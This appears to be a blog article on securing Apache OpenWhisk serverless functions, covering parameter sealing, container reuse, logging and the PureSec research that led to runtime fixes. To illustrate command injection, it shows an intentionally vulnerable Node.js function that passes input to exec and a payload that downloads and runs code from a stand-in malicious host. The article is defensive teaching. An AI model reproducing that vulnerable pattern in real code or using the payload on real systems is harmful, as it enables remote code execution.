Security and Serverless Functions
Serverless computing with functions fundamentally reduces the amount of code you develop and deploy for cloud applications, eschewing the “server” parts, and allowing you to focus on just your functions. For a cloud native application, where functions are APIs, an integrated API gateway handles the routing of events and REST requests to your functions.
If you’re not yet familiar with serverless functions, I recommend my article on creating serverless functions using Apache OpenWhisk. Openwhisk is available as a hosted service via IBM Cloud Functions and Adobe I/O Runtime, or for private deployments from vendors that include Red Hat OpenShift, and most recently WSO2.
So how does developing cloud-native applications using functions affect how you approach securing your application? In short, it doesn’t. Your functions are your code and it is your responsibility to secure your application. There are however three parts to consider.
- The platform: your function will run in some compute resource, namely a Linux or Docker container, and yes it will run on a server. The value proposition behind serverless however is that you do not explicitly create, deploy, manage, or secure that container. It is the platform that takes on all of these operational burdens, and in turn, it is the platform and its operators that manage and secure a function’s compute resources. This includes ensuring your container is isolated from other containers (that are running other user functions), as well as patching the container’s image against known vulnerabilities.
- Identity management and roles: your function should adhere to the least privilege principle so that secrets shared or encoded in your functions do not allow an attacker to compromise your other assets.
- Your function, your responsibility: Your function is still your logic and it is your responsibility to make sure you follow best practices for securing your code. It is also important to consider logging and observability in this context, so that if your code is exploited, you have a way to detect the attack and perform a postmortem. Since your functions execute in resources that are not directly accessible to you, you have to think ahead of time about observability and detection as well.
When you consider that serverless functions are exposed as APIs, then it becomes evident that developers should:
- Sanitize the input parameters a function receives,
- Be cognizant of remote code exploits,
- And check dependencies for vulnerabilities they may be inheriting.
These considerations are echoed in a recent podcast on serverless security with field experts Ben Kehoe of iRobot, Mx. Kas Perch and Erica Windisch of IOpipe, and Ory Segal of PureSec.
Earlier today, PureSec, a startup in the serverless security space announced how it helped make one of the Apache OpenWhisk function runtimes more secure. Their research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code.
When you consider the technology stack behind serverless, it should be evident that traditional server-based code that is vulnerable to remote code exploits, or similar attacks, could be equally compromised if you run the same code using serverless functions.
Understanding the intersection between platform, function, and security.
A serverless function runs inside a container. The serverless platform does not allocate a new container for every execution of a function. This would be prohibitively expensive given today’s container technology. Instead, a function may reuse a previously allocated container (for that function) in order to amortize the cost of allocating the resources that execute the function. This container reuse is a performance optimization both from the platform provider point of view, and the function developer perspective since it lends itself to limited caching of state and data inside the container (thereby reducing expensive data store operations for example).
Serverless developers should understand this underlying resource reuse model however, and this is why function security today is not very different from securing cloud-applications and microservices in that regard: if your function is prone to an attack, that attack can persist for an extended period of time.
It is reasonable to consider how a serverless platform provider, or even a developer using a serverless platform, may selectively configure their deployment to eschew container reuse and enforce a use-once policy for resources. This may be a worthwhile trade-off for some serverless consumers, depending on their risk assessment.
Securing function parameters.
When you write a serverless function in OpenWhisk, you are keenly aware that you are writing a function — and not creating a container. Functions accept parameters, and when the functions are exposed as APIs, the developer should be aware that their functions are now exposed to remote callers who may send invalid requests, hijack parameters, or inject code execution into their functions.
With Apache OpenWhisk, a developer can seal their parameters, making them immutable. As a result, a client request cannot override those values, and this is particularly useful when binding secrets and credentials to function parameters. This feature is enabled by default when an OpenWhisk function is exposed as an HTTP endpoint.
Here is an example function in JavaScript, which accepts a single parameter name
and returns a formatted string.
function main({name}) {
return {body: `hello ${name}!`}
}
Say this function is in a file called hello.js
, you can use the OpenWhisk CLI wsk
to create an HTTP endpoint called fn
for the function (e.g., wsk action create fn hello.js --web true
). The function is now ready to accept HTTP requests.
> curl https://guest.openwhisk/default/fn?name=reader
hello reader!
But sealing the parameters, which is done by providing values for the parameters at action creation time (e.g., wsk action update fn --param name guest
), disallows all requests that try to override already bound values.
> curl https://guest.openwhisk/default/fn?name=reader
{ "error": "Request defines parameters that are not allowed." }
It is important to seal function parameters when exposing functions as HTTP endpoints especially when dealing with secrets and credentials.
Furthermore parameters that are used as part of an exec
or system call, passed on to an SQL database, or used in eval
operations, should be properly sanitized, and special characters (e.g., semicolon or &
for system calls) properly escaped. This helps to ensure your function does not end up executing code that you did not write or intend.
For example consider the following function that forks a process and uses system utilities as part of its logic. For illustration, I use wc
below to count the number of words in an input string
.
function main({string}) {
return new Promise(function(resolve, reject) {
const { exec } = require('child_process')
exec(`echo -n ${string} | wc -w`, (err, stdout, stderr) => {
resolve({body: stdout.trim()})
})
})
}
This function works but is obviously insecure.
> curl https://guest.openwhisk/default/wc \
--data-urlencode "string=serverless security on your mind"
5
An attacker can exploit the unchecked use of the parameter string
to execute arbitrary code, whether by replacing the function itself, as an inline process, or even a background process. Consider what happens if the vulnerable function above is invoked with the following string
parameter instead: "string=; sleep 5"
.
Now worse, imagine the input string is the following.
; wget -O /tmp/oy http://malicous.com; /tmp/oy; ...
This malicious input allows an attacker to fetch their code from a remote location, and execute it.
Observability and detection.
As serverless programming evolves and matures, new tools will help fill the gap for developers in securing their functions. Until then, it is important to keep in mind that serverless means you can stop thinking about servers, not security. Apache OpenWhisk’s functions-first model means advancements in static and dynamic analysis are more readily applicable to a future ecosystem that delivers inherently more secure functions. It is important for developers at the forefront of the serverless movement to think about how they secure their code, and moreover how they can detect attacks when they occur.
There are several mechanisms in place for this today, whether you’re using Apache OpenWhisk or another serverless platform. Namely, logging and monitoring. Some examples include establishing alerts that can detect deviations in function behavior such as very long execution times, unexpected function results, or anomalous log messages.
The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits.
The Apache OpenWhisk community is growing, and the research from PureSec and the improvements to the platform that came about as a result are examples of what open communities are supposed to do — find bugs, patch them, and benefit everyone.
We announced two CVEs (Common Vulnerabilities and Exposures) for the benefit of all Apache OpenWhisk users who might be using containers directly as functions, since they may need to update their Docker dependencies. IBM Cloud Functions deployed updated runtime images as needed. Adobe I/O Runtime, which does not offer the affected images in their service, was not impacted.
The automatic management of the runtime environment for functions demonstrates the benefits of the serverless model: zero overhead to developers, and zero disruption.